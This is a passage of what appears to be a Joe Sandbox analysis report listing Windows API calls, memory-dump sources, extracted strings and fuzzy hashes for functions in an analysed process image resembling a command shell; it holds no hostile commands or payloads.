                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B6D0
                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B6E7
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B701
                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12AF82), ref: 00007FF7AB12B715
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2549470565-0
                                                                                                          • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                          • Instruction ID: 72d572a0f6c6c83583a2d84a407b97cb511e2b9867d9cbaca9d54018084cb4dd
                                                                                                          • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                          • Instruction Fuzzy Hash: C0214835D0B746C6EA16AB19F490079F6A1FB49B88BCA9531DA0E037B4DF3DD845C320
                                                                                                          APIs
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D01C
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D033
                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D06D
                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7AB13507A), ref: 00007FF7AB14D07F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                          • String ID:
                                                                                                          • API String ID: 1033415088-0
                                                                                                          • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                          • Instruction ID: aff7f8a0eeee78f4ec6a1a45f9aad2200e7d82181a29e8cf5dbfc494bd9089f6
                                                                                                          • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                          • Instruction Fuzzy Hash: 5811B231619A4287DB449B28F04417AFBA0FB8AB99F815235FA8F47B74DF3CC0458B10
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB125A2E
                                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF7AB125A4F
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7AB12260D), ref: 00007FF7AB1437AA
                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7AB1437D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 22757656-0
                                                                                                          • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                          • Instruction ID: b80583a87bb6b2877c942ca41b6c084a879eb672d68dc36666041ce6942cb56c
                                                                                                          • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                          • Instruction Fuzzy Hash: 23116371A156458BE7116B1CF488339BA60F789B69F954734D62A073F0DF3CD5498B10
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7AB145433,?,?,?,00007FF7AB1469B8,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1456C5
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB1456D9
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7AB145433,?,?,?,00007FF7AB1469B8,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1456FD
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB145711
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3859560861-0
                                                                                                          • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                          • Instruction ID: a90b74219940b8dfc7011aaec148f166a10b0dec604e085acbb527385370497d
                                                                                                          • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                          • Instruction Fuzzy Hash: BC111872A05B91C6EB019F5AF4440ADBBB4FB8DF88B998125DB4E03728DF38E456C750
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                          • String ID:
                                                                                                          • API String ID: 140117192-0
                                                                                                          • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                          • Instruction ID: a6e7b3b9e1f5e90fbe5b384c0bf98059b8e048515a198359d05580735c393c91
                                                                                                          • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                          • Instruction Fuzzy Hash: EB21E47590AB4591E642AB0CF880769B3B4FB84758F910635DA8D43774EF7DE198CB20
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AD6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AEF
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                            • Part of subcall function 00007FF7AB134A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                            • Part of subcall function 00007FF7AB134A14: memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                            • Part of subcall function 00007FF7AB134A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB13EE64
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB13EE78
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759988882-0
                                                                                                          • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                          • Instruction ID: 834429d60845de893133f9a9978a25b024af5f56d3877c6b77851a077493cf00
                                                                                                          • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                          • Instruction Fuzzy Hash: C3F0E161E16B4286EE5A676DF445178E9E1FF4EB45B8A9534C90F43370EE3CA4448630
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 1606018815-0
                                                                                                          • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                          • Instruction ID: 48ad1b4e216bbe2a915d5c78361e3821d22225b874c50c2d081f9a59e31cef17
                                                                                                          • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                          • Instruction Fuzzy Hash: FEF0F831A26A42CBD6056B18F484179FA60FB8AB16F85A224DA0B033B4DF3CD0088B50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                            • Part of subcall function 00007FF7AB12EF40: wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          • longjmp.MSVCRT ref: 00007FF7AB13CCBC
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13CCE0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          • API String ID: 3282654869-1994581435
                                                                                                          • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                          • Instruction ID: 3421365fc4316141d1e7085e1883034efe92e208ba31e61c4dd4459670dc3548
                                                                                                          • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                          • Instruction Fuzzy Hash: 9D610272A0B342C2FA5AAB1DF450679E294AF057ACFDA4635CA1D076F4EE3CE4418720
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB1511DC
                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB151277
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 1135967885-381716982
                                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                          • Instruction ID: 5b076c5eb20c6234371553485e8776a12fb75699f71d2525b927b572e4cb59b8
                                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                          • Instruction Fuzzy Hash: 8871D77190A24686D762AF1DF4D0679F6A4FB9879CF920336C94E83BB0DF3CA4519B10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memmovewcsncmp
                                                                                                          • String ID: 0123456789
                                                                                                          • API String ID: 3879766669-2793719750
                                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                          • Instruction ID: b1c65fad879541d4b4ee6d8f6d45a91588e72276dbeb39305840e1515f1e051b
                                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                          • Instruction Fuzzy Hash: 0E41FB22F1A78645EA66AF6DF4442BAA394FB44BC8F865231CE4E477B4DF3CD4418350
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1497D0
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1498D7
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                          • Instruction ID: 77f1b81a972cbb77ae7b4a6deadf5f66b9816bd224ec033315eb692fbf98dccb
                                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                          • Instruction Fuzzy Hash: 6441D562A0A756C5EA02EB1DE445039A3A4FB44BD8FA28131DA1D437F5FF39D851C350
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A0FC
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A1FB
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                          • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                          • Instruction ID: b61ef73253eb750bcec097d296d68ebf176054f4745c943fa7b0fdf9f6421546
                                                                                                          • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                          • Instruction Fuzzy Hash: C241D662A1A796C1EA02EB1DE444439A3A4FB45BD8F928131DE5D437F4EF39D881C350
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleTitle
                                                                                                          • String ID: -
                                                                                                          • API String ID: 3358957663-3695764949
                                                                                                          • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                          • Instruction ID: 919052576e9175d2cf851e1d5c372a9c38828b7e7157b4d2eb120a50256b44a2
                                                                                                          • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                          • Instruction Fuzzy Hash: 4D31B425A0A74682E616BB19F450078E6A5BB49BD8F964135CE0E077F1EF3CE445C360
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpswscanf
                                                                                                          • String ID: :EOF
                                                                                                          • API String ID: 1534968528-551370653
                                                                                                          • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                          • Instruction ID: 451325cc4b699a8202dc27a87ff863b4a8bde8d5643453b3744a0c343026931b
                                                                                                          • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                          • Instruction Fuzzy Hash: 29315235A0E64686F69AAB1DF440678F2E0EF44758FC64131DA4D06275EF3CE9458660
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp
                                                                                                          • String ID: /-Y
                                                                                                          • API String ID: 1886669725-4274875248
                                                                                                          • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                          • Instruction ID: d22f2ad07408d64b688d2041d3eede700ea501d25f02cdd69a2731510e7b29b1
                                                                                                          • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                          • Instruction Fuzzy Hash: 85218365E09756C5EA11AB0AF440178F6A0BB44FC8F964032DE99077B4EF3CE4A2D720
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3$3
                                                                                                          • API String ID: 0-2538865259
                                                                                                          • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                          • Instruction ID: e9892f9685899c4c590250c996f03203942766e30f60ee3b67326c79bd9855c9
                                                                                                          • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                          • Instruction Fuzzy Hash: AF013271D0B58ACAF31BAB6CF9A4274F660BF4831DFD60536C40E425B1DF2D68848662
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                          • Instruction ID: 863bbffe3e82f634f7adfd5634ec8fbfbcfebbcc4236ea0605f1a26a9ab0e9b0
                                                                                                          • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
